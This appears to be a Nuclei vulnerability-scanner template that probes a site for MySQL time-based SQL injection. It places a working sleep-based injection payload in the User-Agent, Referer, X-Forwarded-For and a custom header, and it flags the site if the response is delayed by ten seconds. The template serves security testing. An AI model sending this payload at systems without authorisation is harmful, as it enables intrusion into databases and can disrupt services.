id: time-based-sqli

info:
  name: Time-based SQLI
  author: z3r0yu
  severity: medium
  description: |
    MySQL Time Based SQLi.
  reference: https://github.com/sqlmapproject/sqlmap/issues/4091
  tags: sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
      User-Agent: "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"
      Referer: "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"
      X-Forwarded-For: "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"
      Useref: "0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z"
    
    # matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=10'